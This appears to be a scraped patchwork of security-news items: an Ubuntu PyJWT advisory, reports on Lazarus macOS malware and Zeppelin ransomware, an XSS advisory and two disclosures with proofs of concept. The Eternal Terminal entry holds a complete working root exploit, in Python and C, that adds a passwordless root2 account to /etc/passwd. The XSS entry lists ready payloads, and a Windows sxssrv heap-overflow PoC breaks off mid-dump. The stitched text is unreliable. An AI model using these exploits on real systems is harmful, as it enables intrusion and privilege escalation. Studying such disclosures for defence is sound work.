The Freedom of Information Act helps Americans learn what the government is up to. The Poseys exploited it—and became unlikely defenders of transparency.

The Family That Mined the Pentagon's Data for Profit

Ubuntu Security Notice 5526-2 - USN-5526-1 fixed vulnerabilities in PyJWT. Unfortunately this caused a regression by incrementing the internal package version number on Ubuntu 22.04 LTS. This update fixes the problem. Aapo Oksman discovered that PyJWT incorrectly handled signatures constructed from SSH public keys. A remote attacker could use this to forge a JWT signature.

=========================================================================  
Ubuntu Security Notice USN-5526-2  
August 17, 2022

pyjwt regression  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

USN-5526-1 introduced a regression in PyJWT.

Software Description:  
- pyjwt: Python 3 implementation of JSON Web Token

Details:

USN-5526-1 fixed vulnerabilities in PyJWT. Unfortunately this caused a  
regression by incrementing the internal package version number on Ubuntu  
22.04 LTS.  This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Aapo Oksman discovered that PyJWT incorrectly handled signatures  
 constructed from SSH public keys. A remote attacker could use this to forge  
 a JWT signature.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python3-jwt                     2.3.0-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5526-2  
  https://ubuntu.com/security/notices/USN-5526-1  
  https://launchpad.net/bugs/1986487

Package Information:  
  https://launchpad.net/ubuntu/+source/pyjwt/2.3.0-1ubuntu0.2

Ubuntu Security Notice USN-5526-2

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

North Korean APT Lazarus is up to its old tricks with a cyberespionage campaign targeting engineers with a fake job posting that attempt to spread macOS malware. The malicious Mac executable used in the campaign targets both Apple and Intel chip-based systems.

The campaign, identified by researchers from ESET Research Labs and revealed in a series of tweets posted Tuesday, impersonates cryptocurrency trader Coinbase in a job description claiming to seek an engineering manager for product security, researchers divulged.

Dubbed Operation In(ter)ception, the recent campaign drops a signed Mac executable disguised as a job description for Coinbase, which researchers discovered uploaded to VirusTotal from Brazil, they wrote.“Malware is compiled for both Intel and Apple Silicon,” according to one of the tweets. “It drops three files: a decoy PDF document Coinbase\_online\_careers\_2022\_07.pdf, a bundle http\[://\]FinderFontsUpdater\[.\]app and a downloader safarifontagent.”

**Similarities to Previous Malware**

The malware is similar to a sample discovered by ESET in May, which also included a signed executable disguised as a job description, was compiled for both Apple and Intel, and dropped a PDF decoy, researchers said.

However, the most recent malware is signed July 21, according to its timestamp, which means it’s either something new or a variant of the previous malware. It uses a certificate issued in February 2022 to a developer named Shankey Nohria and which was revoked by Apple on Aug. 12, researchers said. The app itself was not notarized.

Operation In(ter)ception also has a companion Windows version of the malware dropping the same decoy and spotted Aug. 4 by Malwarebytes threat intelligence researcher Jazi, according to ESET.

The malware used in the campaign also connects to a different command and control (C2) infrastructure than the malware discovered in May, https:\[//\]concrecapital\[.\]com/%user%\[.\]jpg, which did not respond when researchers tried to connect to it.

**Lazarus on the Loose**

North Korea’s Lazarus is well known as one of the most prolific APTs and already is in the crosshairs of international authorities, having been sanctioned back in 2019 by the U.S. government.

Lazarus is known for targeting academics, journalists and professionals in various industries—particularly the defense industry–to gather intelligence and financial backing for the regime of Kim Jong-un. It has often used impersonation ploys similar to the one observed in Operation In(ter)ception to try to get victims to take the malware bait.

A previous campaign identified in January also targeted job-seeking engineers by dangling fake employment opportunities at them in a spear-phishing campaign. The attacks used Windows Update as a living-off-the-land technique and GitHub as a C2 server.

Meanwhile, a similar campaign uncovered last year saw Lazarus impersonating defense contractors Boeing and General Motors and claiming to seek job candidates only to spread malicious documents.

**Changing It Up**

However, more recently Lazarus has diversified its tactics, with the feds revealing that Lazarus also has been responsible for a number of crypto heists aimed at padding the regime of Jong-un with cash.

Related to this activity, the U.S. government levied sanctions against cryptocurrency mixer service Tornado Cash for helping Lazarus launder cash from its cybercriminal activities, which they believe in part are being to fund North Korea’s missile program.

Lazarus even has dipped its toe in ransomware amid its frenzy of cyberextortion activity. In May, researchers at cybersecurity firm Trellix tied the recently emerged VHD ransomware to the North Korean APT.

APT Lazarus Targets Engineers with macOS Malware

A privilege escalation to root exists in Eternal Terminal prior to version 6.2.0. This is due to the combination of a race condition, buffer overflow, and logic bug all in PipeSocketHandler::listen().

**Vulnerability Description:**

An authenticated attacker can send a crafted packet to an Eternal Terminal server which allows them to change the ownership permissions on an arbitrary file. This can be leveraged to gain root privileges on the server.

This was due to a combination of a race condition and a buffer overflow in PipeSocketHandler::listen() as well as a logic bug in the PortForwardHandler:createSource().

The logic bug: If you send a crafted InitialPayload packet containing a PortForwardSourceRequest and arbitrary SocketEndpoint you can invoke a call to PipeSocketHandler::listen() with the arbitrary SocketEndpoint. The name member variable of the SocketEndpoint is used by several system calls in PipeSocketHandler::listen() including unlink(), resulting in arbitrary file delete.

The race condition: Inside PipeSocketHandler::listen(), there are subsequent calls to unlink(), bind(), chmod(), and chown(), to the provided name member variable of SocketEndpoint without verifying the path. If an attacker can modify the file pointed to by the provided name variable (through symlink manipulation for example) between bind() and chmod()/chown(), they can arbitrarily change a file's permission and ownership. I was able to utilize this vulnerability to arbitrarily change the permissions on /etc/passwd, thus resulting in a root privilege escalation. However I found the race condition by itself was not reliable.

The buffer overflow: Inside PipeSocketHandler::listen(), there are no bounds checks on a strcpy() which takes the provided name variable and copies it into the local.sun_path member variable of a socket. The maximum path length for this field is 108 characters, but there is no limit on the size of the name variable, allowing for a stack-based buffer overflow. This could be utilized in a traditional memory corruption exploit (i.e. overwriting return addresses and controlling code execution), but would require additional work in order to prevent failure during the function and the epilog of the function (i.e. the fd variable needs to be valid for bind() and listen(), the pipePath variable needs to point to a crafted fake chunk in order to be freed properly during the function epilog). In this case I abused a discrepancy between path handling in bind(), where it truncates the provided path to 108 characters even if the member variable is longer. By overflowing the local.sun_path I can have the the bind() call point to a different path, which prevents a failure if the file already exists.

In the final exploit I use the name variable of /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd, and the race utility creates a large file for unlink in order to improve race condition reliability. In order to run the proof of concept compile the .proto file with protoc, compile the race utility statically for your target and run it locally on the target, and run the python script remotely against the target. This will change the ownership of /etc/passwd on the target machine and create the user root2 which does not require a password to login to.

**Proof of Concept:**

This python file should be run remotely against the ET target.

    #!/usr/bin/env python3
    
    import argparse
    import struct
    import time
    import socket
    import paramiko
    import ET_pb2
    
    PROTOCOL_VERSION = 6
    INITIAL_PAYLOAD = 253
    HEADER_SIZE = 2
    
    parser = argparse.ArgumentParser(description='[*] Root privesc exploit for Eternal Terminal, \
                                                  assumes SSH access to box')
    parser.add_argument('host',type=str,help='target machine')
    parser.add_argument('user',type=str,help='user to SSH as')
    parser.add_argument('--etport',type=int,default='2022',help='port ET is running on')
    parser.add_argument('--sshport',type=int,default='22',help='port SSH is running on')
    parser.add_argument('--racepath',type=str,default='./race',help='location of race utility')
    args = parser.parse_args()
    
    #Initializes SSH/SFTP connection
    def initialize_ssh_connection(host, user, ssh_port):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host,ssh_port,username=user,timeout=4)
        return ssh
    
    def initiate_client_connection(id, connection):
        #Craft request
        connect_request = ET_pb2.ConnectRequest()
        connect_request.clientId = id
        connect_request.version = PROTOCOL_VERSION
    
        request = connect_request.SerializeToString()
        length = struct.pack('l', len(request))
        #Send Request
        connection.sendall(length)
        connection.sendall(request)
    
    # Send static initial payload, this was pulled from a client communication but could be
    # dynamically constructed as well
    def send_initial_payload(connection, key):
        """
    [INFO 2021-10-27 08:35:43,553 client-main BackedWriter.cpp:17] Hexdump of payload
    000000: 00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e  ......_...fCZdD.
    000010: 54 8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37  T...?O.......Q.7
    000020: 7d 95 10 0f 64 8b 2b 1a 2c 7c ac 79 df f9 8b 50  }...d.+.,|.y...P
    000030: 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67  .~Z^..:.ef.!.V.g
    000040: 8b be 1a fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5  .........F...#..
    000050: 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e a6 31 f9 6d  '.....;G+..>.1.m
    000060: ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45  ...ecU&...]....E
    000070: 12 a4 df 3e 8f 40 54 51 ab 2c 8a 0d 88 ae 3d 44  ...>.@TQ.,....=D
    000080: c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be dc 62  ..*...`H...p...b
    000090: cb 36 a4 42 11 5c fc ac                          .6.B.\..
    
        #Example python code which would generate the payload
        initial_payload = ETerminal_pb2.InitialPayload()
        initial_payload.jumphost = False
        port_forward_source_request = ETerminal_pb2.PortForwardSourceRequest()
        source = ET_pb2.SocketEndpoint()
        destination = ET_pb2.SocketEndpoint()
        sourcePath = '/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd'
        destinationPath = '/tmp/test'
        source.name = sourcePath
        destination.name = destinationPath
        port_forward_source_request.source.CopyFrom(source)
        port_forward_source_request.destination.CopyFrom(destination)
        #initial_payload.reversetunnels = [port_forward_source_request]
        initial_payload.reversetunnels.append(port_forward_source_request)
        serialized_payload = initial_payload.SerializeToString()
    """
    
        packet = bytes.fromhex("00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e 54 \
        8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37 7d 95 10 0f 64 8b 2b 1a 2c 7c \
        ac 79 df f9 8b 50 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67 8b be 1a \
        fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e \
        a6 31 f9 6d ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45 12 a4 df 3e 8f \
        40 54 51 ab 2c 8a 0d 88 ae 3d 44 c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be \
        dc 62 cb 36 a4 42 11 5c fc ac")
        connection.sendall(packet)
    
    if __name__ == "__main__":
        #Initialize SSH/SFTP connection
        print("[*] Initializing SSH connection")
        ssh = initialize_ssh_connection(args.host, args.user, args.sshport)
        print("[*] Initializing SFTP connection")
        sftp = initialize_ssh_connection(args.host, args.user, args.sshport).open_sftp()
    
    
        #Clean up previous race binary
        print("[*] Cleaning up previous race binary")
        stdin, stdout, stderr = ssh.exec_command('rm -rf ~/race')
        exit_status = stdout.channel.recv_exit_status()
        #print(stdout.read().splitlines())
    
        print("[*] Killing previous race processes")
        stdin, stdout, stderr = ssh.exec_command('pkill race')
        exit_status = stdout.channel.recv_exit_status()
    
        #Get home directory
        print("[*] Getting home directory")
        stdin, stdout, stderr = ssh.exec_command('echo $HOME')
        exit_status = stdout.channel.recv_exit_status()
        home = stdout.read().splitlines()[0].decode('utf-8')
    
        #Copy new binary over
        print("[*] Copying new race binary over")
        sftp.put(args.racepath, f'{home}/race')
    
        #Run race binary
        print("[*] Running race utility in background")
        stdin, stdout, stderr = ssh.exec_command(f'chmod +x {home}/race && {home}/race&')
        exit_status = stdout.channel.recv_exit_status()
        #TODO: modify to wait for return from race binary to create 2.0G passwd file
        time.sleep(5)
    
        #Registering random id/key
        print("[*] Registering id/key on ET server")
        id = '25F81F3CC230D45B'
        key = 'E59AD03E34FC3AB9DED568F47EA27677'
        cmd = f'echo \'{id}/{key}_xterm-256color\n\' | etterminal&'
        stdin, stdout, stderr = ssh.exec_command(cmd)
        exit_status = stdout.channel.recv_exit_status()
        stdout.read().splitlines()
    
        #Setup ET socket connetion
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:
    
            connection.connect((args.host, args.etport))
            print("[*] Initiating client connection")
            initiate_client_connection(id, connection) #TerminalClient.cpp:140
            print("[*] Sending payload")
            send_initial_payload(connection, key)
            print("[*] You can log in as root2 on the target machine without a password, try it!")
    

This C file should be compiled statically and run locally on the target server.

    #include <sys/inotify.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    
    #define EVENT_SIZE  ( sizeof (struct inotify_event) ) /*size of one event*/
    #define MAX_EVENTS 4096/* Maximum number of events to process*/
    #define LEN_NAME 4  /* Assuming that the length of the filename */
    #define BUF_LEN     ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ))
    
    int fd,wd;
    void sig_handler(int sig){
           inotify_rm_watch( fd, wd );
           close( fd );
           exit( 0 );
    }
    
    int main(int argc, char *argv[])
    {
    	//Cleanup previous exploit attempts
    	printf("[*] Cleaning up previous exploit attempts\n");
    	system("/bin/rm -rf /tmp/aaa");
    	system("mkdir -p /tmp/aaa/etc");
    	system("touch /tmp/aaa/etc/passwd");
    	printf("[*] Making large file for unlink race\n");
    	system("yes | dd of=/tmp/aaa/etc/passwd bs=1M iflag=fullblock count=2048");
    
        // watch the tmp/aaa/etc folder for the creation of the socket file
        char *path = "/tmp/aaa/etc";
        signal(SIGINT,sig_handler);
    
        fd = inotify_init();
    
        if (fcntl(fd, F_SETFL, O_NONBLOCK) < 0)
        exit(2);
    
        wd = inotify_add_watch(fd,path,IN_DELETE);
        if(wd==-1){
    	printf("Could not watch\n");
        }
        else {
    	printf("Watching...\n");
        }
    
        while(1) {
    	int i=0, length;
    	char buffer[BUF_LEN];
    
    	length = read(fd,buffer,BUF_LEN);
    
    	while(i<length){
    	    struct inotify_event *event = (struct inotify_event *) &buffer[i];
    		if(event->len){
    		    if (strcmp(event-> name,"passwd") == 0) {
    			if ( event->mask & IN_DELETE ) {
    			    rename("/tmp/aaa/etc", "/tmp/aaa/etcc");
    			    symlink("/etc", "/tmp/aaa/etc");
    
    			    printf("[*] Waiting to overwrite /etc/passwd\n");
    			    int i = 0;
    			    while(i < 3) {
    
    				if (access("/etc/passwd", W_OK)  == 0) {
    				    // Add malicious entry to passwd and login as user
    				    printf("[*] Adding entry root2 with no password");
    				    char * entry = "root2::0:0:root:/root:/bin/bash";
    				    FILE * pFile = fopen("/etc/passwd", "a");
    				    fprintf(pFile, entry);
    				    fclose(pFile);
    				    exit(1);
    				}
    				printf("[*] Waiting...\n");
    				sleep(1);
    				i = i + 1;
    			    }
    			    printf("[*] Something went wrong, try again!\n");
    			    exit(-1);
    			}
    			}
    		    
    		    i += EVENT_SIZE + event->len;
    		}
    	}
    }
    }
    

This protobuf file should be compiled using protoc and used as a reference for the python file.

    //ET.proto
    syntax = "proto2";
    package et;
    option optimize_for = LITE_RUNTIME;
    
    enum EtPacketType {
      // Count down from 254 to avoid collisions
      HEARTBEAT = 254;
      INITIAL_PAYLOAD = 253;
      INITIAL_RESPONSE = 252;
    }
    
    message ConnectRequest {
      optional string clientId = 1;
      optional int32 version = 2;
    }
    
    enum ConnectStatus {
      NEW_CLIENT = 1;
      RETURNING_CLIENT = 2;
      INVALID_KEY = 3;
      MISMATCHED_PROTOCOL = 4;
    }
    
    message ConnectResponse {
      optional ConnectStatus status = 1;
      optional string error = 2;
    }
    
    message SequenceHeader { optional int32 sequenceNumber = 1; }
    
    message CatchupBuffer { repeated bytes buffer = 1; }
    
    message SocketEndpoint {
      optional string name = 1;
      optional int32 port = 2;
    }
    

**Timeline:**

10/29/21: Vulnerabilities were disclosed to author of ET  
11/3/21: Partial fixes for the most serious issues to ET were released (including this one)  
1/27/22: 90 day deadline for public disclosure reached

CVE-2022-24949: Eternal Terminal Root Privilege Escalation

A race condition exists in Eternal Terminal prior to version 6.2.0 that allows an authenticated attacker to hijack other users' SSH authorization socket, enabling the attacker to login to other systems as the targeted users. The bug is in UserTerminalRouter::getInfoForId().

@@ -13,7 +13,7 @@ int PipeSocketHandler::connect(const SocketEndpoint& endpoint) {

FATAL\_FAIL(sockFd);

initSocket(sockFd);

remote.sun\_family = AF\_UNIX;

strcpy(remote.sun\_path, pipePath.c\_str());

strncpy(remote.sun\_path, pipePath.c\_str(), sizeof(remote.sun\_path));

  

VLOG(3) << "Connecting to " << endpoint << " with fd " << sockFd;

int result =

@@ -104,7 +104,7 @@ set<int> PipeSocketHandler::listen(const SocketEndpoint& endpoint) {

FATAL\_FAIL(fd);

initServerSocket(fd);

local.sun\_family = AF\_UNIX; /\* local is declared before socket() ^ \*/

strcpy(local.sun\_path, pipePath.c\_str());

strncpy(local.sun\_path, pipePath.c\_str(), sizeof(local.sun\_path));

unlink(local.sun\_path);

  

FATAL\_FAIL(::bind(fd, (struct sockaddr\*)&local, sizeof(sockaddr\_un)));

CVE-2022-24950: red fixes (#468) · MisterTea/EternalTerminal@900348b

Inout SiteSearch version 2.0.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : inoutscripts.com               │ │                                         ││  Vendor   : Inout Scripts                  │ │                                         ││  Software : Inout SiteSearch 2.0.1         │ │ Inout SiteSearch is a premium script    ││  Vuln Type: Cross Site Scripting Reflected │ │ that allows you to add a site           ││  Method   : GET                            │ │ search feature                          ││  Impact   : Manipulate the content of      │ │                                         ││             the site                       │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL     Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal  loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7         CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'searchkeyword' is vulnerable to XSShttp://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]Some XSS Payloads Reflectedjavascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'><IMG """><SCRIPT>alert("XSS")</SCRIPT>"\></TITLE><SCRIPT>alert("XSS");</SCRIPT>[-] Done

Inout SiteSearch 2.0.1 Cross Site Scripting

The CISA has seen a resurgence of the malware targeting a range of verticals and critical infrastructure organizations by exploiting RDP, firewall vulnerabilities.

The CISA has seen a resurgence of the malware targeting a range of verticals and critical infrastructure organizations by exploiting RDP, firewall vulnerabilities.

Zeppelin ransomware is back and employing new compromise and encryption tactics in its recent campaigns against various vertical industries—particularly healthcare—as well as critical infrastructure organizations, the feds are warning.

Threat actors deploying the ransomware as a service (RaaS) are tapping remote desktop protocol (RDD) exploitation and SonicWall firewall vulnerabilities–alongside previously used phishing campaigns–to breach target networks, according to an advisory from the Cybersecurity and Infrastructure Security Agency (CISA) released Thursday.

Zeppelin also appears to have a new multi-encryption tactics, executing the malware more than once within a victim’s network and creating different IDs and file extensions for multiple instances attack, according to the CISA.

“This results in the victim needing several unique decryption keys,” according to the advisory.

The CISA has identified multiple variants of Zeppelin through various FBI investigations, with attacks occurring as recently as June 21, the agency said.

****Targets and Tactics****

Zeppelin is a variant of the Delphi-based ransomware-as-a-service (RaaS) family initially known as Vega or VegaLocker, which emerged at the beginning of 2019 in advertisements on the Russia-based Yandex.Direct, according to BlackBerry Cylance.

Unlike its predecessor, Zeppelin’s campaigns have been much more targeted, with threat actors first taking aim at tech and healthcare companies in Europe and the United States.

The latest campaigns continue to target healthcare and medical organizations most often, according to the CISA. Tech companies also remain in the crosshairs of Zeppelin, with threat actors also using the RaaS in attacks against defense contractors, educational institutions and manufacturers, the agency said.

Once they successfully infiltrate a network, threat actors spend one to two weeks mapping or enumerating it to identify data enclaves, including cloud storage and network backup, according to the agency. They then deploy Zeppelin ransomware as a .dll or .exe file or contained within a PowerShell loader.

Zeppelin also appears to be using the common ransomware tactic of double extortion in its latest campaigns, exfiltrating sensitive data files from a target prior to encryption for potential publication online later if the victim refuses to pay, according to the CISA.

****Multiple Encryption****

Once Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file extension, e.g., file.txt.txt.C59-E0C-929, according to the CISA.

Threat actors also leave a note file that includes a ransom note on compromised systems, typically on a user desktop system, the agency said. Zeppelin actors typically request payments in Bitcoin in the range of several thousand dollars to more than $1 million.

The latest campaigns also show threat actors using a new tactic associated with Zeppelin to execute the malware multiple times within a victim’s network, which means a victim would need not one but multiple decryption keys to unlock files, according to the CISA.

However, this may or may not be a unique aspect of a ransomware attack, noted one security professional. Roger Grimes, data-driven defense evangelist for security firm KnowBe4, said it’s not uncommon for threat actors to encrypt different files separately but use one master key to unlock systems.

“Most ransomware programs today have an overall master key which encrypts a bunch of other keys which really do the encryption,” he told Threatpost in an email.

When the victim asks for proof that the ransomware attacker has decryption keys that can successfully unlock files if a ransom is paid, the ransomware group then uses a single key to unlock a single set of files to prove its worth, Grimes said.

Feds: Zeppelin Ransomware Resurfaces with New Compromise, Encryption Tactics

A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.

**Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow**

    Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILS```__int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src){  unsigned int Length; // ebx  SIZE_T NewMaxLength; // r8  WCHAR *Heap; // rax  __int64 Status; // rax  Length = Src->Length;  if ( (_WORD)Length )  {    NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 ***    Dst->MaximumLength = NewMaxLength;    Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 ***    Dst->Buffer = Heap;    if ( Heap )    {      memcpy_0(Heap, Src->Buffer, Length); // *** 3 ***      Dst->Buffer[(unsigned __int64)Length >> 1] = 0;      Status = 0i64;      Dst->Length = Length;    }    else    {      return 0xC0000017i64;    }  }  else  {    *(_DWORD *)&Dst->Length = 0;    Status = 0i64;    Dst->Buffer = 0i64;  }  return Status;}```The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3].The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size.## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASEThis (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string.1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#include <windows.h>#include <winternl.h>#include <string>PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0,                   size_t max_length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main(int argc, char* argv[]) {  HMODULE ntdll = LoadLibrary(L\"ntdll\");  if (argc == 1) {    STARTUPINFO si = {0};    PROCESS_INFORMATION pi = {0};    si.cb = sizeof(si);    WCHAR image_path[MAX_PATH + 1];    GetModuleFileName(NULL, image_path, MAX_PATH);    std::wstring args = image_path;    args += L\" child\";    CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, CREATE_SUSPENDED,                  NULL, NULL, &si, &pi);    PVOID csrClientConnectToServer =        GetProcAddress(ntdll, \"CsrClientConnectToServer\");    size_t offset = 0;    for (; offset < 0x1000; ++offset)      if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000)        break;    uint32_t new_size = 0x20000;    WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset,                       &new_size, sizeof(new_size), NULL);    ResumeThread(pi.hThread);  } else {#define INIT_PROC(name) \\  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));    INIT_PROC(CsrAllocateCaptureBuffer);    INIT_PROC(CsrFreeCaptureBuffer);    INIT_PROC(CsrClientCallServer);    INIT_PROC(CsrCaptureMessageString);    const size_t HEADER_SIZE = 0x40;    uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;    SET_FIELD(0, 0x900000041);    SET_FIELD(3, 0x10101);    SET_FIELD(6, 0x88);    SET_FIELD(7, -1);    std::string manifest =        \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \"        \"manifestVersion='1.0'>\"        \"<assemblyIdentity name='A' version='1.0.0.0'/>\"        \"</assembly>\";    SET_FIELD(8, manifest.c_str());    SET_FIELD(9, manifest.size());    SET_FIELD(22, 1);    PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200);    CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2);    CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\otepad.exe\");    CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\");    SET_FIELD(17, 0xfffefffe);    CsrClientCallServer(msg, capture_buffer, 0x1001001e,                        sizeof(msg) - HEADER_SIZE);  }}```4) Wait for a crash:```CONTEXT:  000000bd41a3ddc0 -- (.cxr 0xbd41a3ddc0)rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000ffferip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8 r8=000000000000002e  r9=00000000000003ff r10=000002224855c000r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001r14=000000bd41a3ee38 r15=000000bd41a3ee20iopl=0         nv up ei pl nz na po nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206ntdll!memcpy+0x113:0033:00007ffb`d59d3c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  000002224855c000 EXCEPTION_RECORD:  000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0)ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 000002224855c000Attempt to write to address 000002224855c000STACK_TEXT:  000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86000000bd`41a3ed20 00007ffb`d2f31dce : 00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : 